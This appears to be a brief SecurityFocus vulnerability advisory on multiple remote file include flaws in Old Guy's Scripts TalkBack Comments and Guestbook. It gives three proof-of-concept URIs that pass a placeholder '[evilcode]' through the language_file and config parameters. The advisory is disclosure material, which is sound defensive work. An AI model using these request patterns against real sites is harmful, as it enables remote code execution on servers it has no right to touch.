Old Guy's Scripts TalkBack Comments and Guestbook Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/path/comments-display-tpl.php?language_file=[evilcode]
http://www.example.com/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://www.example.com/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]


 

Privacy Statement
Copyright 2010, SecurityFocus